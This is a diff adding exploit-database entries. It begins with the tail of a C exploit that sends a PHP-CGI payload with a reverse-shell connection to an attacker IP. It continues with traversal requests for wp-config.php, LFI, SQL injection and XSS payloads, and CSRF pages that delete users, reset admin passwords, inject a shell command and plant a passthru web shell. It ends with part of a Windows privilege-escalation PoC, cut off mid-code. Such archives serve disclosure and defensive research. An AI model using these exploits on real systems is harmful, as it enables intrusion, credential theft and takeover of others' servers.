 servercopy = malloc(sizeof(struct sockaddr_in));
 if (!servercopy) {
 	printf("malloc error (1)\n");
 	exit(255);
 }
 memset(&server, '\0', sizeof(struct sockaddr_in));
 memcpy(&server.sin_addr, he->h_addr_list[0],  he->h_length);
 server.sin_family = AF_INET;
 server.sin_port = htons(port);
 memcpy(servercopy, &server, sizeof(struct sockaddr_in));
 return servercopy;
 }
 char *sslread(connection *c)
 {
  char *rc = NULL;
  int received, count = 0, count2=0;
  char ch;
  for(;;)
  {
   if (!rc)
    rc = calloc(1024, sizeof (char) + 1);
   else
    if (count2 % 1024 == 0) {
     rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);
    }
    received = SSL_read(c->handle, &ch, 1);
    if (received == 1) {
     rc[count++] = ch;
     count2++;
     if (count2 > 1024*5)
 	  break;
    }
    else
     break;
   }
  return rc;
 }
 char *read_(int sockfd)
 {
  char *rc = NULL;
  int received, count = 0, count2=0;
  char ch;
  for(;;)
  {
   if (!rc)
    rc = calloc(1024, sizeof (char) + 1);
   else
    if (count2 % 1024 == 0) {
     rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);
    }
    received = read(sockfd, &ch, 1);
    if (received == 1) {
     rc[count++] = ch;
     count2++;
     if (count2 > 1024*5)
 	  break;
    }
    else
     break;
   }
  return rc;
 }
 void main(int argc, char *argv[])
 {
  char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,
   *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;
  char httpsflag=0;
  unsigned short port=0, reverseport=0;
  struct sockaddr_in *server;
  int sockfd;
  unsigned int writesize, tmpsize;
  unsigned int i;
  connection *sslconnection;
  printf("-== Apache Magika by Kingcope ==-\n");
  for(;;)
  {
 	 int c;
     int option_index=0;
     static struct option long_options[] = {
 	   {"target", required_argument, 0, 0 },
 	   {"port", required_argument, 0, 0 },
 	   {"protocol", required_argument, 0, 0 },
 	   {"reverse-ip", required_argument, 0, 0 },
 	   {"reverse-port", required_argument, 0, 0 },
 	   {"force-interpreter", required_argument, 0, 0 },	   
 	   {0, 0, 0, 0 }
 	  };
 	 c = getopt_long(argc, argv, "", long_options, &option_index);
     if (c < 0)
     	break;
     switch (c) {
 	 case 0:
 	  switch (option_index) {
 	   case 0:
 	    if (optarg) {
 	     target = calloc(strlen(optarg)+1, sizeof(char));
 	     if (!target) {
 		  printf("calloc error (2)\n");
 	      exit(255);
         }
 	     memcpy(target, optarg, strlen(optarg)+1);
    	}
        break;
       case 1:
        if(optarg)
 	     port = atoi(optarg);
        break;
       case 2:
        protocol = calloc(strlen(optarg)+1, sizeof(char));
        if (!protocol) {
 	     printf("calloc error (3)\n");
         exit(255);
        }
        memcpy(protocol, optarg, strlen(optarg)+1);
        if (!strcmp(protocol, "https"))
         httpsflag=1;
        break;
       case 3:
        reverseip = calloc(strlen(optarg)+1, sizeof(char));
        if (!reverseip) {
 	     printf("calloc error (4)\n");
         exit(255);
        }
        memcpy(reverseip, optarg, strlen(optarg)+1);       
        break;
       case 4:
 	    reverseport = atoi(optarg);       
 		reverseportstr = calloc(strlen(optarg)+1, sizeof(char));
        if (!reverseportstr) {
 	     printf("calloc error (5)\n");
         exit(255);
        }
        memcpy(reverseportstr, optarg, strlen(optarg)+1);  	     
        break;
       case 5:
        forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));
        if (!forceinterpreter) {
 	     printf("calloc error (6)\n");
         exit(255);
        }
        memcpy(forceinterpreter, optarg, strlen(optarg)+1);       
        break;
       default:
        usage(argv);
 	  }
 	  break;
 	 default:
 	  usage(argv);
     }
  }
  if ((optind < argc) || !target || !protocol || !port ||
      !reverseip || !reverseport){
 	usage(argv);
  }
  server = gethostbyname_(target, port);
  if (!server) {
   printf("Error while resolving hostname. (7)\n");
   exit(255);
  }
  char *interpreters[5];
  int ninterpreters = 5;
  interpreters[0] = strdup("/cgi-bin/php");
  interpreters[1] = strdup("/cgi-bin/php5");
  interpreters[2] = strdup("/cgi-bin/php-cgi");
  interpreters[3] = strdup("/cgi-bin/php.cgi");
  interpreters[4] = strdup("/cgi-bin/php4");
  for (i=0;i<ninterpreters;i++) {
   interpreter = interpreters[i];
   if (forceinterpreter) {
     interpreter = strdup(forceinterpreter);
   }
   if (forceinterpreter && i)
    break;
   printf("%s\n", interpreter);
   sockfd = socket(AF_INET, SOCK_STREAM, 0);
   if (sockfd < 1) { 
 	 printf("socket error (8)\n");
 	 exit(255);
   }
   if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) < 0) {
    printf("connect error (9)\n");
    exit(255);	  
   }
   if (httpsflag) {
    sslconnection = (connection*) malloc(sizeof(connection));
    if (!sslconnection) {
     printf("malloc error (10)\n");
     exit(255);   
    }
    sslconnection->handle = NULL;
    sslconnection->ctx = NULL;
    SSL_library_init();
    sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());
    if (!sslconnection->ctx) {
 	 printf("SSL_CTX_new error (11)\n");
     exit(255);
    }
    sslconnection->handle = SSL_new(sslconnection->ctx);
    if (!sslconnection->handle) {
 	 printf("SSL_new error (12)\n");
 	 exit(255);   
    }
    if (!SSL_set_fd(sslconnection->handle, sockfd)) {
 	 printf("SSL_set_fd error (13)\n");
     exit(255);
    }
    if (SSL_connect(sslconnection->handle) != 1) {
 	 printf("SSL_connect error (14)\n");
     exit(255);       
    }
   }
   tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;
   tmpstr = (char*)calloc(tmpsize, sizeof(char));
   snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);
   writesize = strlen(target) + strlen(interpreter) + 
     strlen(poststr) + strlen(tmpstr) + 64;
   writestr = (char*)calloc(writesize, sizeof(char));
   snprintf(writestr, writesize, poststr, interpreter,
     target, strlen(tmpstr), tmpstr);
   if (!httpsflag) {
 	 write(sockfd, writestr, strlen(writestr));
 	 readbuf = read_(sockfd);
   } else {
 	 SSL_write(sslconnection->handle, writestr, strlen(writestr));
 	 readbuf = sslread(sslconnection);
   }
   if (readbuf) {
     printf("***SERVER RESPONSE***\n\n%s\n\n", readbuf);  
   } else {
    printf("read error (15)\n");
    exit(255);	  
   }
  }
  exit(1);
 }
--- a/platforms/php/webapps/39575.txt
+++ b/platforms/php/webapps/39575.txt
@ -0,0 +1,16 @@
 # Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
 # Exploit Author: Wadeek
 # Website Author: https://github.com/Wad-Deek
 # Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
 # Version: 1.1
 # Tested on: Xampp on Windows7
 [Version Disclosure]
 ======================================
 http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
 ======================================
 [PoC]
 ======================================
 /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
 ======================================
--- a/platforms/php/webapps/39576.txt
+++ b/platforms/php/webapps/39576.txt
@ -0,0 +1,19 @@
 # Exploit Title: Wordpress Import CSV | Directory Traversal
 # Exploit Author: Wadeek
 # Website Author: https://github.com/Wad-Deek
 # Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip
 # Stable Tag: 1.1
 # Tested on: Xampp on Windows7
 [Version Disclosure]
 ======================================
 /wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt
 ======================================
 [PoC]
 ======================================
 Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.
 Click on the link "From an url".
 In "URL" field to write "../../../wp-config.php".
 Validate form and inspect the body.
 ======================================
--- a/platforms/php/webapps/39577.txt
+++ b/platforms/php/webapps/39577.txt
@ -0,0 +1,27 @@
 # Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
 # Date: 2016-03-19
 # Google Dork : inurl:/wp-content/plugins/abtest/
 # Exploit Author: CrashBandicot
 # Vendor Homepage: https://github.com/wp-plugins/abtest
 # Tested on: Chrome
 # Vulnerable File : abtest_admin.php
 <?php 
 require 'admin/functions.php'; 
 if (isset($_GET['action'])) {
  include 'admin/' . $_GET['action'] . '.php';
 } else {
   include 'admin/list_experiments.php'; 
 }
 ?>
 # PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
 # Pics : http://i.imgur.com/jZFKYOc.png
--- a/platforms/php/webapps/39580.txt
+++ b/platforms/php/webapps/39580.txt
@ -0,0 +1,19 @@
 Exploit Title:  DORG - Disc Organization System SQL Injection And Cross Site Scripting 
 Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
 Author: SECUPENT 
 Website:www.secupent.com
 Email: research{at}secupent{dot}com
 Date: 20-3-2016
 SQL Injection: 
 link: http://localhost/dorg/results.php?q=3&search=%2527&type=3
 Screenshot: http://secupent.com/exploit/images/drogsql.jpg
 Cross Site Scripting (XSS):
 link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3
 Screenshot: http://secupent.com/exploit/images/drogxss.jpg
--- a/platforms/php/webapps/39582.txt
+++ b/platforms/php/webapps/39582.txt
@ -0,0 +1,91 @@
 <!--
 [+] Credits: John Page aka hyp3rlinx
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/XOOPS-CSRF.txt
 Vendor:
 =============
 xoops.org
 Product:
 ================
 Xoops 2.5.7.2
 Vulnerability Type:
 ===================================
 CSRF - Arbitrary User Deletions
 Vulnerability Details:
 =====================
 Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL
 users from the Xoops database.
 References:
 http://xoops.org/modules/news/article.php?storyid=6757
 Exploit Codes:
 =============
 Following CSRF attack delete all users from database, following POC code
 will sequentially delete 100 users from the Xoops application.
 -->
 <iframe name="ifrm" style="display:none" name="hidden-form"></iframe>
 <form target="ifrm" name='memberslist' id='CSRF' action='
 http://localhost/xoops-2.5.7.2/htdocs/modules/system/admin.php?fct=users'
 method='POST'>
 <input type="hidden" id="ids" name="memberslist_id[]" />
 <input type="hidden" name="fct" value="users" />
 <input type="hidden" name="edit_group" value="" />
 <input type="hidden" name="selgroups" value="" />
 <input type="hidden" name="op" value="users_add_delete_group" />
 <input type="hidden" name="op" value="action_group" />
 <input type="hidden" name="Submit" value="Submit+Query" />
 </form>
 <script>
 var c=-1
 var amttodelete=100
 var id=document.getElementById("ids")
 var frm=document.getElementById("CSRF")
 function doit(){
 c++
 arguments[1].value=c
 arguments[0].submit()
 if(c>=amttodelete){
  clearInterval(si)
  alert("Done!")
 }
 }
 var si=setInterval(doit, 1000, frm, id)
 </script>
 <!--
 Disclosure Date:
 ==================================
 Jan 29, 2016: Vendor Notification
 Vendor confirms and patches Xoops
 March 17, 2016 : Public Disclosure
 =================================
 [+] Disclaimer
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
 the author.
 The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere. (c) hyp3rlinx.
 -->
--- a/platforms/php/webapps/39583.txt
+++ b/platforms/php/webapps/39583.txt
@ -0,0 +1,86 @@
 [+] Credits: John Page aka hyp3rlinx
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:
 http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt
 Vendor:
 =============
 xoops.org
 Product:
 ================
 Xoops 2.5.7.2
 Vulnerability Type:
 ===========================
 Directory Traversal Bypass
 Vulnerability Details:
 =====================
 Xoops 2.5.7.2 has checks to defend against directory traversal attacks.
 However, they can be easily bypassed by simply issuing "..././" instead of
 "../"
 References:
 http://xoops.org/modules/news/article.php?storyid=6757
 Exploit Codes:
 ==============
 In Xoops code in 'protector.php' the following check is made for dot dot
 slash "../" in HTTP requests
 /////////////////////////////////////////////////////////////////////////////////
 if( is_array( $_GET[ $key ] ) ) continue ;
 if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
 {
 $this->last_error_type = 'DirTraversal' ;
 $this->message .= "Directory Traversal '$val' found.\n" ;
 ////////////////////////////////////////////////////////////////////////////////
 The above Xoops directory traversal check can be defeated by using
 ..././..././..././..././
 you can test the theory by using example below test case by supplying
 ..././ to GET param.
 $val=$_GET['c'];
 if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
 {
 echo "traversal!";
 }else{
 echo "ok!" . $val;
 }
 Disclosure Date:
 ==================================
 Feb 2, 2016: Vendor Notification
 Vendor confirms and patches Xoops
 March 17, 2016 : Public Disclosure
 ==================================
 [+] Disclaimer
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
 the author.
 The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere. (c) hyp3rlinx.
--- a/platforms/php/webapps/39584.txt
+++ b/platforms/php/webapps/39584.txt
@ -0,0 +1,33 @@
 # Exploit Title: Wordpress image-export LFD
 # Date: 03/21/2016
 # Exploit Author: AMAR^SHG
 # Vendor Homepage: http://www.1efthander.com
 # Software Link:
 http://www.1efthander.com/category/wordpress-plugins/image-export
 # Version: Everything is affected including latest (1.1.0 )
 # Tested on: Windows/Unix on localhost
 download.php file code:
 <?php
 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
 	$file = $_GET['file'];
 	header( 'Content-Type: application/zip' );
 	header( 'Content-Disposition: attachment; filename="' . $file . '"' );
 	readfile( $file );
 	unlink( $file );
 	exit;
 }
 ?>
 Proof of concept:
 Note that because of the unlink, we potentially can destroy the wordpress core.
 Simply add the get parameter file:
 localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php
 Found by AMAR^SHG (Shkupi Hackers Group)
--- a/platforms/php/webapps/39586.txt
+++ b/platforms/php/webapps/39586.txt
@ -0,0 +1,99 @@
 Advisory ID: HTB23294
 Product: Dating Pro
 Vendor: DatingPro
 Vulnerable Version(s): Genie (2015.7) and probably prior
 Tested Version: Genie (2015.7)
 Advisory Publication:  February 10, 2016  [without technical details]
 Vendor Notification: February 10, 2016 
 Vendor Patch: February 29, 2016 
 Public Disclosure: March 18, 2016 
 Vulnerability Type: Cross-Site Request Forgery [CWE-352]
 Risk Level: Critical 
 CVSSv3 Base Scores: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H], 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
 Solution Status: Fixed by Vendor
 Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 -----------------------------------------------------------------------------------------------
 Advisory Details:
 High-Tech Bridge Security Research Lab discovered multiple Cross-Site Request Forgery (CSRF) vulnerabilities in a popular dating social network Dating Pro. 
 A remote unauthenticated attacker can perform CSRF attacks to change administrator’s credentials and execute arbitrary system commands. Successful exploitation of the vulnerability may allow attacker to gain complete control over the vulnerable website, all its users and databases. 
 1) CSRF in "/admin/ausers/index"
 The vulnerability exists due to the absence of validation of HTTP request origin in "/admin/ausers/index" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and change login, email address and password of the current website administrator. This means a total takeover of the website. 
 A simple CSRF exploit below will change login, email and password to "admin", "admin@mail.com" and "123456" respectively. 
 To reproduce the vulnerability, just create an empty HTML file, paste the CSRF exploit code into it, login to iTop website and open the file in your browser:
 <form action="http://[host]/admin/ausers/index" method="post" name="main">
 <input type="hidden" name="nickname" value="admin">
 <input type="hidden" name="email" value="admin@mail.com">
 <input type="hidden" name="update_password" value="1">
 <input type="hidden" name="password" value="123456">
 <input type="hidden" name="repassword" value="123456">
 <input type="hidden" name="name" value="admin">
 <input type="hidden" name="description" value="">
 <input type="hidden" name="btn_save" value="Save">
 <input value="submit" id="btn" type="submit" />
 </form><script>document.main.submit();</script>
 Now you can login as administrator using the above-mentioned credentials.
 2) CSRF in /admin/notifications/settings/
 The vulnerability exists due to absence of validation of HTTP request origin in "/admin/notifications/settings/" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and execute arbitrary system commands with privileges of the web server. 
 A simple exploit below will replace full path to sendmail program with the following "cp config.php config.txt" system command that will copy "config.php" file into "config.txt" making its content publicly accessible:
 <form action="http://[host]/admin/notifications/settings/" method="post" name="main">
 <input type="hidden" name="mail_charset" value="utf-8">
 <input type="hidden" name="mail_protocol" value="sendmail">
 <input type="hidden" name="mail_useragent" value="pg-mailer">
 <input type="hidden" name="mail_from_email" value="admin@site.com">
 <input type="hidden" name="mail_from_name" value="PgSoftware">
 <input type="hidden" name="" value="">
 <input type="hidden" name="btn_save" value="Save">
 <input type="hidden" name="mail_mailpath" value="cp config.php config.txt ||">
 </form><script>document.main.submit();</script>
 The command will be executed the next time when any email is being sent by the vulnerable web application. 
 It is also possible to trigger this event using the following following CSRF exploit:
 <form action="http://[host]/admin/notifications/settings/" method="post" name="main">
 <input type="hidden" name="mail_to_email" value="mail@mail.com">
 <input type="hidden" name="btn_test" value="Send">
 </form><script>document.main.submit();</script>
 -----------------------------------------------------------------------------------------------
 Solution:
 Update to Genie (2015.7) released after February 29, 2016.
 -----------------------------------------------------------------------------------------------
 References:
 [1] High-Tech Bridge Advisory HTB23294 - https://www.htbridge.com/advisory/HTB23294  - Admin Password Reset & RCE via CSRF in Dating Pro
 [2] Dating Pro - http://www.datingpro.com - Everything you need to start and run a dating business.
 [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
 [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
 [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
 -----------------------------------------------------------------------------------------------
 Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
--- a/platforms/php/webapps/39587.txt
+++ b/platforms/php/webapps/39587.txt
@ -0,0 +1,68 @@
 Advisory ID: HTB23293
 Product: iTop
 Vendor: Combodo
 Vulnerable Version(s): 2.2.1 and probably prior
 Tested Version: 2.2.1
 Advisory Publication:  February 10, 2016  [without technical details]
 Vendor Notification: February 10, 2016 
 Vendor Patch: February 11, 2016 
 Public Disclosure: March 18, 2016 
 Vulnerability Type: Cross-Site Request Forgery [CWE-352]
 Risk Level: High 
 CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
 Solution Status: Fixed by Vendor
 Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 -----------------------------------------------------------------------------------------------
 Advisory Details:
 High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via Cross-Site Request Forgery flaw that is also present in the application. The vulnerability exists due to absence of validation of HTTP request origin in "/env-production/itop-config/config.php" script, as well as lack of user-input sanitization received via "new_config" HTTP POST parameter. 
 A remote unauthenticated attacker can perform CSRF attack and execute arbitrary PHP code on the vulnerable system with privileges of the web server. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary system commands on the web server, gain complete access to vulnerable web application and its databases that may contain very sensitive information. 
 The attacker shall create a malicious web page with CSRF exploit code, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and permanently inject malicious PHP code into iTop configuration file.
 CSRF exploit will inject the following PHP code into iTop configuration file:
 <? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?> 
 To reproduce the vulnerability, just create an empty HTML file and paste the following CSRF exploit code into it:
 <form action="http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor" method="post" name="main">
 <input type="hidden" name="operation" value="save">
 <input type="hidden" name="prev_config" value="1">
 <input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>">
 <input value="submit" id="btn" type="submit" />
 </form>
 Then login to iTop website with admin account and open the file in your browser. 
 After successful exploitation an attacker can run arbitrary system commands using the "/pages/UI.php" script. This simple PoC will execute "/bin/ls" directory listing command: 
 http://[host]/pages/UI.php?cmd=ls
 -----------------------------------------------------------------------------------------------
 Solution:
 Replace the file datamodels/2.x/itop-config/config.php by the version from the appropriate revision from SVN, then run the setup again.
 More Information:
 https://sourceforge.net/p/itop/tickets/1202/
 -----------------------------------------------------------------------------------------------
 References:
 [1] High-Tech Bridge Advisory HTB23293 - https://www.htbridge.com/advisory/HTB23293  - RCE via CSRF in iTop
 [2] iTop - http://www.combodo.com - iTop: open source ITIL ITSM Software.
 [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
 [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
 [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
 -----------------------------------------------------------------------------------------------
 Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
--- a/platforms/php/webapps/39588.txt
+++ b/platforms/php/webapps/39588.txt
@ -0,0 +1,86 @@
 * Exploit Title: Multiple (persistent) XSS in ProjectSend
 * Discovery Date: 2016/02/19
 * Public Disclosure Date: 2016/03/17
 * Exploit Author: Michael Helwig
 * Contact: https://twitter.com/c0dmtr1x
 * Project Homepage: http://www.projectsend.org/
 * Software Link: http://www.projectsend.org/download/108/
 * Version: r582
 * Tested on: Ubuntu 14.04 with Firefox 45.0
 * Category: webapps
 Description
 ========================================================================
 ProjectSend is a self-hosted PHP based file-transfer platform. Several serious vulnerabilities have been discovered so far (e.g. https://www.exploit-db.com/exploits/39385/). Here are some further persistent and non-persistent XSS vulnerabilities which affect ProjectSend.
 PoC
 ========================================================================
 1. Non-Persistent XSS
 ~~~~~~~~~~~~~~~~~~~~~~
 1.1 - As client in searchbox on my_files/index.php:
 curl 'http://projectsend.local.de/my_files/' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/my_files/' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E'
 1.2 - As admin in searchboxes on "Manage Clients", "Clients groups" and "System Users":
 curl 'http://projectsend.local.de/clients.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/clients.php' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E'
 Output:
 <input type="text" name="search" id="search" value=""><script>alert('XSS')</script>" class="txtfield form_actions_search_box" />
 The searchboxes on "Clients groups", "System Users" and the "Recent activities log" are injectible in the same way.
 2. Persistent XSS
 ~~~~~~~~~~~~~~~~~~
 1.1 - As client in "MyAccount" field "Name":
 No special vector required.
 HTML output for input "><script>alert(1);</script>:
 <input type="text" name="add_client_form_name" id="add_client_form_name" class="required" value=""><script>alert(1);</script>" placeholder="Will be visible on the client's file list" />
 This XSS also affects admins when they open the "Clients" -> "Manage clients" page:
 clients.php html output:
 <td><input type="checkbox" name="selected_clients[]" value="2" /></td>
 <td>"><script>alert(1);</script></td>
 <td>Client1</td>
 The fields "Adress" and "Telephone" are injectible in the same way.
 1.2  As client in "File upload" field "Name":
 A simple vector suffices: "<script>alert('XSS')</script>
 The XSS is activated when admins open the dashboard (the code gets loaded from /actions-log.php via ajax) or when he accesses the "Recent activities log"
 actions-log.php html output:
 <td class="footable-visible">"<script>alert('XSS')</script></td>
 1.3 As admin in "Groups" -> "Add new"
 The fields "Name" and "Description" are injectible. The XSS is activated on the "Manage groups" page.
 Simple vector: "><script>alert('XSS')</script>
 Timeline
 ========================================================================
 2016/02/19 - Issues discovered
 2016/02/22 - Developed fixes for these and multiple other vulnerabilities. 
             Informed project maintainers
 2016/03/04 - Fixes merged into master branch by project maintainers
 Solution
 ========================================================================
 Update to current version from GitHub. See https://github.com/ignacionelson/ProjectSend/issues/80 for discussion.
--- a/platforms/windows/local/39574.cs
+++ b/platforms/windows/local/39574.cs
@ -0,0 +1,234 @@
 /*
 Sources: 
 https://bugs.chromium.org/p/project-zero/issues/detail?id=687
 https://googleprojectzero.blogspot.ca/2016/03/exploiting-leaked-thread-handle.html
 Windows: Secondary Logon Standard Handles Missing Sanitization EoP
 Platform: Windows 8.1, Windows 10, not testing on Windows 7
 Class: Elevation of Privilege
 Summary:
 The SecLogon service does not sanitize standard handles when creating a new process leading to duplicating a system service thread pool handle into a user accessible process. This can be used to elevate privileges to Local System.
 Description:
 The APIs CreateProcessWithToken and CreateProcessWithLogon are exposed to user applications, however they’re actually implemented in a system service, Secondary Logon. When these methods are called it’s actually dispatched over RPC to the service. 
 Both these methods take the normal STARTUPINFO structure and supports the passing of standard handles when the STARTF_USESTDHANDLES is used. Rather than the “standard” way of inheriting these handles to the new process the service copies them manually using the  SlpSetStdHandles function. This does something equivalent to:
 BOOL SlpSetStdHandles(HANDLE hSrcProcess, HANDLE hTargetProcess, HANDLE handles[]) {
   foreach(HANDLE h : handles) {
     DuplicateHandle(hSrcProcesss, h, hTargetProcess, &hNewHandle, 0, FALSE, DUPLICATE_SAME_ACCESS);
   }
 }
 The vulnerability is nothing sanitizes these values. NtDuplicateObject special cases a couple of values for the source handle, Current Process (-1) and Current Thread (-2). NtDuplicateObject switches the thread’s current process to the target process when duplicating the handle, this means that while duplicating -1 will return a handle to the new process -2 will return a handle to the current thread which is actually a thread inside the svchost process hosting seclogon. When passing DUPLICATE_SAME_ACCESS for the current thread handle it's automatically given THREAD_ALL_ACCESS rights. The handle now exists in the new process and can be used by low privileged code.
 This can be exploited in a number of ways. The new process can set the thread’s context causing the thread to dispatch to an arbitrary RIP. Or as these are thread pool threads servicing RPC requests for services such as BITS, Task Scheduler or seclogon itself you could do things like force a system level impersonation token (repeatedly) which overrides the security enforcement of these services leading to arbitrary file writes or process creation at Local System. It would be easy enough to run the exploit multiple times to capture handles to all thread pool threads available for RPC in the hosting process and then just keep trying until it succeeds.
 One final point on exploitability. A normal user cannot use CreateProcessWithToken as the service checks that an arbitrary process can be opened by the user and has SeImpersonatePrivilege in its primary token. CreateProcessWithLogon will work but it seems you’d need to know a user’s password which makes it less useful for a malicious attacker. However you can specify the LOGON_NETCREDENTIALS_ONLY flag which changes the behaviour of LogonUser, instead of needing valid credentials the password is used to change the network password of a copy of the caller’s token. The password can be anything you like, it doesn’t matter.
 Proof of Concept:
 I’ve provided a PoC as a C# source code file. You need to compile it with Any CPU support (do not set 32 bit preferred). The PoC must match the OS bitness. 
 1) Compile the C# source code file.
 2) Execute the poc executable as a normal user. This will not work from low IL.
 3) The PoC should display a message box on error or success.
 Expected Result:
 The call to CreateProcessWithLogon should fail and the PoC will display the error.
 Observed Result:
 The process shows that it’s captured a handle from a service process. If you check process explorer or similar you’ll see the thread handle has full access rights.
 */
 #include <stdio.h>
 #include <tchar.h>
 #include <Windows.h>
 #include <map>
 #define MAX_PROCESSES 1000
 HANDLE GetThreadHandle()
 {
  PROCESS_INFORMATION procInfo = {};
  STARTUPINFO startInfo = {};
  startInfo.cb = sizeof(startInfo);
  startInfo.hStdInput = GetCurrentThread();
  startInfo.hStdOutput = GetCurrentThread();
  startInfo.hStdError = GetCurrentThread();
  startInfo.dwFlags = STARTF_USESTDHANDLES;
  if (CreateProcessWithLogonW(L"test", L"test", L"test", 
               LOGON_NETCREDENTIALS_ONLY, 
               nullptr, L"cmd.exe", CREATE_SUSPENDED, 
               nullptr, nullptr, &startInfo, &procInfo))
  {
    HANDLE hThread;   
    BOOL res = DuplicateHandle(procInfo.hProcess, (HANDLE)0x4, 
             GetCurrentProcess(), &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS);
    DWORD dwLastError = GetLastError();
    TerminateProcess(procInfo.hProcess, 1);
    CloseHandle(procInfo.hProcess);
    CloseHandle(procInfo.hThread);
    if (!res)
    {
      printf("Error duplicating handle %d\n", dwLastError);
      exit(1);
    }
    return hThread;
  }
  else
  {
    printf("Error: %d\n", GetLastError());
    exit(1);
  }
 }
 typedef NTSTATUS __stdcall NtImpersonateThread(HANDLE ThreadHandle, 
      HANDLE ThreadToImpersonate, 
